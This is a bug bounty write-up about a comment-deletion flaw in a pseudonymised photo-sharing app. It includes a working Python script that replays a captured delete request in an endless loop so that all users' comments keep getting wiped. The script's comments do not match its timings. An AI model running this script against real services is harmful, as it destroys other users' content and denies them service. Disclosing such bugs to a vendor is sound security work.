From N/A to $$$: A Simple Python Script Led to Application-Level DoS
Hello, friend! This is mrhashimamin. I miss you, I really do. This is an old story (well, actually just 2 months ago, but I’m doing this for you, mi amigo 3>).
It’s about a bug I found in a public bug bounty program (I won’t disclose anything that might reveal the target, but I guess you’ll figure it out, xD). Let’s call it images-app.com.
It’s a social media app for sharing photos, memes, etc. Users can react to/add comments on those photos, along with a bunch of other interesting features.
The Not Applicable (N/A) Disaster
After a few days of using the app as a regular user, reviewing disclosed reports of old bugs, and testing core functions (reset, login, signup), I decided to focus on the comment feature.
I started by manipulating parameters when adding a comment, trying to edit someone else’s comment, and triggering any detailed or unknown errors. Nothing worked.
But here’s the thing: when I deleted my own comment for the first time, the server responded with a 200 OK (as expected). However, when I sent the same request multiple times, it still returned 200 OK every time.
“So what?” you might ask. Let’s go back to the photo I was testing on. And yeah…all comments were deleted!
My Mistake (Don’t Do This, Please)
I was too fkn rash and reported it immediately without fully understanding why it happened. And yeah, this is what went down.
So, please, take your time and always try to escalate anything you find. Give it some time, dig deeper, and if you still find nothing more impactful, then go ahead and report it.
Why Was This a Mistake?
Well, when the triager tried to reproduce this, he actually couldn’t. Here’s the thing: when you send the delete request more than once (e.g., 3 times), you end up deleting your own comment + two other comments — but only until a new comment is added by another user. Then, the comments come back again.
So, in the end, I didn’t really do anything that had a real impact. They closed it as N/A because they couldn’t reproduce it.
Making It a Real Bug
I switched to another function again and again for two weeks until I had this thought: “Why wouldn’t I use a Python script to automate the whole process over and over?”
So, I created a simple Python script to turn this into a valid bug. Here are the steps:
- The attacker chooses any image and
posts a commenton it. - The attacker attempts to
delete his own comment, captures the request, and saves it toreq.txt. - The attacker uses this Python script to
send the request multiple times, every5 seconds(or less). Any new commentadded by auserwill bedeleted, along withall existing comments, denying users from using thecomment function.
Python Script:
# Thanks to Chat-GPT btw
import requests
import time
# Function to parse req.txt
def parse_request(file_path):
with open(file_path, "r") as file:
lines = file.readlines()
# Parse request line
request_line = lines[0].strip()
method, url_path, http_version = request_line.split(" ")
base_url = "https://www.images-app.com"
url = base_url + url_path
# Parse headers and body
headers = {}
body = None
is_body = False
for line in lines[1:]:
line = line.strip()
if not line:
is_body = True
continue
if is_body:
body = line
else:
key, value = line.split(": ", 1)
headers[key] = value
return method, url, headers, body
# Function to send the request twice
def send_request(method, url, headers, body):
for _ in range(5):
response = requests.request(method, url, headers=headers, data=body)
print(f"Sent request: {response.status_code}")
print("$ Waiting for the next cycle $")
# Main loop to send requests every 10 minutes
file_path = "req.txt"
while True:
# Parse the request from req.txt
method, url, headers, body = parse_request(file_path)
# Send the request twice
send_request(method, url, headers, body)
# Wait for 2 minutes before the next cycle
time.sleep(30)After they triaged it and accepted it as a P3, they downgraded it to a P4 (yeah, typical scam as usual).
Never mind, that’s the story for today. I hope you find this write-up useful. Thanks, and keep hacking 3>
